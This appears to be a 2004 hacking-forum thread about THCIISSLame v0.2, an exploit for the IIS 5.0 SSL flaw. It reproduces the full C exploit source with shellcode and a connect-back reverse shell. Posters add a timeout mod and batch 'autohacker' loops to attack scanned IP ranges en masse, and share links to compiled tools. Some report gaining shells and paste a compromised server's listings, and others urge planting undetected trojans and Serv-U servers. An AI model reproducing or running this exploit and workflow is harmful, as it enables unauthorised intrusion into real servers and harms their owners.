Iis5 Ssl V0.2

o0oKARo0o

Apr 24 2004, 12:03 PM

San port -443 and only english or german machines which have SP4 otherwise it will hang after sending the exploit..

3plx

Apr 24 2004, 12:10 PM

guyz can some1 give me the auto hacker
i got lost of open poerts but i cant ge shell from them and i cant check it manually all those ips
so plz who have here the autohacker

Roby

Apr 24 2004, 12:35 PM

QUOTE (3plx @ Apr 24 2004, 03:10 PM)

guyz can some1 give me the auto hacker
i got lost of open poerts but i cant ge shell from them and i cant check it manually all those ips
so plz who have here the autohacker

It's easy to write your own autohacker - it takes less than a minute, here is the code you put in a .bat file:
v2:

CODE

for /f "eol=; tokens=1*" %%i in (results.txt) do LAMEIIS.exe %%i yourIP yourPORT

v1:

CODE

for /f "eol=; tokens=1*" %%i in (results.txt) do LAMEIIS.exe %%i

results.txt - txt file with IP to check.
LAMEIIS.exe - you know what that is.

Roby

KieMaN

Apr 24 2004, 12:40 PM

i have try some but didn/t find any shell

3plx

Apr 24 2004, 12:49 PM

10x for the auto hacker but it always stack on the 1st ip and waiting for shell waht can i do to fix that

laggy

Apr 24 2004, 12:51 PM

QUOTE (jimmy @ Apr 24 2004, 02:14 AM)

make some bat with : patch.exe /quiet /forcerestart /o /n /f
that will to the job if you use the correct patch for the correct os

than second, autohacker with 0.2 won't work because idd, no timeout build in
if you can some c you can easely add a timeout like I did

CODE

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell
[*] Exploit appears to have failed!

That's what mine does now, really comes in handy.
BTW exploit version 0.2 is definately better than 0.1

Could you please share this with us?

michael

Apr 24 2004, 01:50 PM

could some1 help me out here
i'm stuck with the timeout thingie here on v0.2
keeps hanging like posted by other members before

thx in advance

loco5

Apr 24 2004, 01:54 PM

i dont understant why it does not work for all people (it does not work for me

)

dEuS

Apr 24 2004, 02:39 PM

Hey cool.
thX man!

Is there any way that the batch file automaticly goes to the next ip in the list after 5 seconds or something like this?
Because if the exploit doesnt work we are waiting, and waiting,and waiting....

I try it on my own, but dont know how...

edit:
can I do it with the "sleep" command? It doesnt work if I write it at the end, but it makes no sense to write it at the beginning?!

Ecko

Apr 24 2004, 03:51 PM

@dEuS

only search in the source code for:

CODE

printf("[*] waiting for shell\n");

put the following code 1 line under that!

CODE

Sleep(6000);
printf("[*] exploit didn't w0rk - timeout!\n\n");
printf("[*][*][*] modded by Ecko [*][*][*]\n");
exit(-1);

3plx

Apr 24 2004, 04:24 PM

can some 1 compile it plz cuz my dev c++ cant compile that

CODE

/*****************************************************************************/
/* THCIISSLame 0.2 - IIS 5 SSL remote root exploit */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
/* THC PUBLIC SOURCE MATERIALS */
/* */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake */
/* */
/* compile with MS Visual C++ : cl THCIISSLame.c */
/* */
/* This little update uses a connectback shell ! */
/* */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

char shellcode[] =
"\xeb\x25\x7a\x69\x7f\x00\x00\x01\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x89\xce\x31\xdb\x53"
"\x53\x53\x53\x56\x46\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30"
"\x6a\x10\x55\x57\xff\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55"
"\x55\xff\x55\xec\x8d\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65"
"\x68\x5c\x63\x6d\x64\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57"
"\x53\x53\xfe\xca\x01\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88"
"\x50\xb1\x08\x53\x53\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff"
"\x55\xf0\x6a\xff\xff\x55\xe4";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;

unsigned short cbport;
unsigned long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCIISSLame v0.2 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

if(argc<4 || argc>4)
usage();

badbuf = malloc(327);
memset(badbuf,0,327);

printf("\n[*] building buffer\n");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper);

strcat(p,greetings_to_microsoft);

offset^=XOR;
strncat(p,(unsigned char *)&offset,4);

cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

strcat(p,shellcode);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(443);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,326,0);
printf("[*] exploit send\n");
Sleep(500);

mytcp.sin_addr.s_addr = 0;
mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

rc=bind(sock2,(struct sockaddr *)&mytcp,16);
if(rc!=0)
{
printf("bind error() %d\n",WSAGetLastError());
exit(-1);
}

rc=listen(sock2,1);
if(rc!=0)
{
printf("listen error()\n");
exit(-1);
}

printf("[*] waiting for shell\n");
Sleep(6000);
printf("[*] exploit didn't w0rk - timeout!\n\n");
printf("[*][*][*] modded by Ecko[*][*][*]\n");
exit(-1);

sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
printf("[*] Exploit successful ! Have fun !\n");
printf("[*] --------------------------------------------------------------------\n\n");
shell(sock3);
}
}
else
{
printf("\nCan't connect to ssl port 443!\n");
exit(-1);
}

shutdown(sock,1);
closesocket(sock);
shutdown(sock,2);
closesocket(sock2);
shutdown(sock,3);
closesocket(sock3);

free(badbuf);

exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}

plz guyz some 1 compile it it is the the modded by ecko xploit

OldSkool

Apr 24 2004, 04:26 PM

autohacker v.02

www.area51-crew.de/freesux.rar

lol deus^^

Ecko

Apr 24 2004, 04:29 PM

@3plx

QUOTE

compile with MS Visual C++ : cl THCIISSLame.c

but i've here a compiled version without hang off...!

Get it here with right click save under

hav3 phun!

dEuS

Apr 24 2004, 04:39 PM

I love you ecko

I´ll get 1 million errors while compiling and I only use the command which are standing in the *.c file...

ThX 4 compiling again!

cya

Ecko

Apr 24 2004, 04:45 PM

no problem @ deus

michael

Apr 24 2004, 04:56 PM

so....did any1 here actually got any shells with the 0.2 version
and does it only works with german/english servers ?!!?

rvd

Apr 24 2004, 05:39 PM

Haven't got any shells this far, maybe i have just badluck or am i doing something wrong. I'll tell you what i did:

- I compiled the code with dev c++ with the mod of Ecko thank you for that.
- I made a little autohacker in .bat file, not anything special.
- Then i started scanning with a modified version of sfind, i scanned on port 443 at a german range.
- After the scanning i did a banner scan from at the results of the port scan, (did it with Scanline: command sl -bhpt 80 -f input.txt -o output.txt
- Filtered the banner scan and toke every ip where the banner scan said: Microsoft-IIS/5.0
- Then i put the ip's in a txt file and executed the autohacker.
- Most of the time's it say's: Exploit did't work - Timeout! (because of the ecko mod)

Well i don't see that i do anything wrong, so maybe i have just bat luck, well anyway maybe some one else could help me or i have helped him (because of my steps and has he more luck then me)

Well thnx in advance

G777

Apr 24 2004, 05:44 PM

heres my little autohacker gui, (thanx to Ecko for the modded sploit)

CODE

http://www.freewebs.com/guernica777/G777-SSL-IIS.rar

ps ignore the netcat button its just there cos i couldnt be bothered to take it out again

Ecko

Apr 24 2004, 06:06 PM

peaz

i've just made an english version of my mod

you can get it here:

Right click save as

hav3 phun

*edit*

@G777

very nice stuff you codet!

*EDIT2*
W0000T!!!
G777
PERFECT!!! It works perfect! i got a shell!!! just scan 62.47.*.* and you get many many results!! Nice

ind0r

Apr 24 2004, 06:31 PM

Hi all! I tried it a lot of times but it worked only few times. But the most problem was when I got shell because few minuts (or seconds) later IP of destination didn't answer, ping or sth like that didn't work. When I got shell, firstly I tried "net user" and I saw RPC error. Could you help?

rush

Apr 24 2004, 06:32 PM

G777 youre source is already down hehe, nice shot!
http://www.freewebs.com/guernica777/G777-SSL-IIS.rar

G777

Apr 24 2004, 06:35 PM

lol damn freehosts man

new link

CODE

http://www.angelfire.com/theforce/g777/G777-IIS-SSL.rar

ESKiM0J03

Apr 24 2004, 06:42 PM

thanks E..still seams in a diff lang to me thou well the part after send exploit..not that itsa big deal thanks for the compile!

arn0ld

Apr 24 2004, 07:18 PM

G777
thx for the auto-hacker
Q: i'm still supposed to get this bind error ?

CODE

bind error() 10048

cuz it's the same thing...

ESKiM0J03

Apr 24 2004, 07:24 PM

arnold if im correct you dont run netcat at all

FazerFreak

Apr 24 2004, 07:30 PM

G777 nice job you did there

gonna check it out tonight

mighty_falcon

Apr 24 2004, 07:49 PM

QUOTE (G777 @ Apr 24 2004, 06:35 PM)

lol damn freehosts man

new link

CODE

http://www.angelfire.com/theforce/g777/G777-IIS-SSL.rar

QUOTE

The page you are attempting to access has been removed because it violated Angelfire's Terms of Service.

both links down

michael

Apr 24 2004, 08:52 PM

im confused here...do u use netcat with this or not...and what port u use with netcat..does that matter ?!!?

ESKiM0J03

Apr 24 2004, 08:57 PM

tried a few 1000 ips and no shell

DarkAngel52457

Apr 24 2004, 09:19 PM

hello

I have a problem

wenn i upload my serv-u an start it i can´t connetc to the server whit FlashFXP

i have this problem by all server

help me please

Sorry for my bad englisch

Ecko

Apr 24 2004, 09:26 PM

thats the wrong way @DarkAngel52457 you should first install a trojan!

FazerFreak

Apr 24 2004, 09:33 PM

any tips on trojans that are easy , small and good use?

preferably not detected by av ofcoz

loco5

Apr 24 2004, 09:39 PM

someone have a idea that whay it s not work with all people ( i m under win98 se)

DarkAngel52457

Apr 24 2004, 09:39 PM

What for a trojan is good for this ????

Than i have many Shell

saendler

Apr 24 2004, 09:54 PM

@G777 both links are down...damn..i'm to late...

anyone out there to help out

thyr0x1ne

Apr 24 2004, 09:55 PM

many shells but no "serv-u success" ?
im not surprised ; admin who use SSL for the security of their site use of course Antivir/Firewall ; dont expect fall into a poor protected server or an .edu

michael

Apr 24 2004, 10:00 PM

QUOTE (Ecko @ Apr 24 2004, 09:26 PM)

thats the wrong way @DarkAngel52457 you should first install a trojan!

What u mean by that ?!!?...i know what a trojan is but whats it good for ?!!?

jpno5

Apr 24 2004, 10:08 PM

trojans r good for nothin bar getting urself caught, darkangel check the servustartuplog.txt. u will proberly find that serv-u is already running on the machine run fport and look for any suspicious proccesses. theres also a perl script been released 2 day which is 20x better

DarkAngel52457

Apr 24 2004, 10:10 PM

i can´t connect to serv-u when i have start it

QUOTE

by Ecko
thats the wrong way @DarkAngel52457 you should first install a trojan!

what for a trojan

SeNe

Apr 24 2004, 10:17 PM

QUOTE (DarkAngel52457 @ Apr 24 2004, 09:19 PM)

hello

I have a problem

wenn i upload my serv-u an start it i can´t connetc to the server whit FlashFXP

i have this problem by all server

help me please

Sorry for my bad englisch

because with the connect back exploit u only can enter lan boxes (network machines).
when u got a hit just type ipconfig and look the info u get, if u see something like this:

PPP adapter {8B5DB1CD-7435-44D4-81C4-B70C6283CFE3}:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.234.235
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . :

then u cant start serv-u there, because the listening IP address is internal.

i got many hits with v. 0.2 but almost all are internal ips.

Demsta

Apr 25 2004, 03:42 AM

QUOTE (thyr0x1ne @ Apr 24 2004, 09:55 PM)

many shells but no "serv-u success" ?
im not surprised ; admin who use SSL for the security of their site use of course Antivir/Firewall ; dont expect fall into a poor protected server or an .edu

i have fallen into many.. just to let them know that they need a patch

Demsta

Apr 25 2004, 04:00 AM

QUOTE (SeNe @ Apr 23 2004, 10:54 PM)

u can download the patch from here PATCH ME and yes u can patch from CMD just google a bit and u will find the answer

cheers

, was looking for this the other day but i coulndt find it

realloader

Apr 25 2004, 04:39 AM

Serv-u is and was starting on this Maschine, but i can not connect to it.
And i test 4 Trojaner Optix, Prorat, Beast, Theef,but i can not connect to my Trojaner too.
What can i do?
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9C2F-BC5B

Directory of C:\

02/21/2002 09:16p <DIR> Bkup
06/26/2002 06:48p <DIR> Documents and Settings
11/12/2001 09:42p <DIR> Event logs
02/04/2002 08:44p 2,931,326 Exchange Server Setup Progress.log
11/06/2001 09:04p <DIR> Inetpub
01/19/2002 08:24p 43,690 junk.txt
02/21/2002 09:01p 3,487 legacy.ldf
11/25/2002 08:50a <DIR> pcnet
04/13/2004 10:33a <DIR> Program Files
02/04/2002 08:11p <DIR> Temp
05/27/2002 10:16a <DIR> WebAdminLogs
04/13/2004 10:52a <DIR> WINNT
3 File(s) 2,978,503 bytes
9 Dir(s) 1,918,889,472 bytes free

C:\>net start
net start
These Windows 2000 services are started:

Automatic Updates
Background Intelligent Transfer Service
COM+ Event System
Computer Browser
DameWare Mini Remote Control
DHCP Client
DHCP Server
Distributed File System
Distributed Link Tracking Client
Distributed Link Tracking Server
Distributed Transaction Coordinator
DNS Client
DNS Server
Event Log
File Replication Service
FTP Publishing Service
IIS Admin Service
Intersite Messaging
IPSEC Policy Agent
Kerberos Key Distribution Center
License Logging Service
Logical Disk Manager
Messenger
Microsoft Exchange Event
Microsoft Exchange IMAP4
Microsoft Exchange Information Store
Microsoft Exchange Management
Microsoft Exchange MTA Stacks
Microsoft Exchange POP3
Microsoft Exchange Routing Engine
Microsoft Exchange System Attendant
Microsoft Search
Net Logon
Network Associates Alert Manager
Network Associates McShield
Network Associates Task Manager
Network Connections
Network News Transport Protocol (NNTP)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry Service
Removable Storage
RunAs Service
Security Accounts Manager
Server
Simple Mail Transport Protocol (SMTP)
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper Service
Telephony
Terminal Services
Windows Internet Name Service (WINS)
Windows Management Instrumentation
Windows Management Instrumentation Driver Extensions
Windows Time
Workstation
World Wide Web Publishing Service

The command completed successfully.

C:\>

oPtIk

Apr 25 2004, 06:09 AM

n1

G777

Apr 25 2004, 07:00 AM

heres another link for my autohacker for you guys that missed it

oh yeah, remember ignore the netcat button its only there because i couldnt be bothered taking it out and redoing the gui

CODE

http://squadron11.tripod.com/G777-SSL-IIS.exe

tte

Apr 25 2004, 07:03 AM

QUOTE (G777 @ Apr 25 2004, 07:00 AM)

heres another link for my autohacker for you guys that missed it

oh yeah, remember ignore the netcat button its only there because i couldnt be bothered taking it out and redoing the gui

CODE

http://squadron11.tripod.com/G777-SSL-IIS.exe

Send it to me by mail, ill upload it to somewhere stable.
erezpix@yahoo.com

sh4d0w`

Apr 25 2004, 07:08 AM

just posted 2 hours before, and now : Sorry, but the page or the file that you're looking for is not here.

i can put it on my webspace if u want....but i first need to have it

hegemonie

Apr 25 2004, 07:11 AM

yea, would be better cuz the tripod link give me this

Sorry, but the page or the file that you're looking for is not here.
? Please check to see that you've entered the correct URL.
? The owner of this site may have chosen to delete their membership.
? The site may have been removed due to a violation of Tripod's Terms of Service.
? The site may have been moved to a different URL.

G777

Apr 25 2004, 07:17 AM

dammit them guys are quick lol
ok heres another link, this one should be ok

CODE

http://www.freewebs.com/guernica777/G777-IIS-SSL.rar

(use flashget)

DarkAngel52457

Apr 25 2004, 07:57 AM

nice Tool @G777

the problem i can´t connect to serv-u

What can i do ????????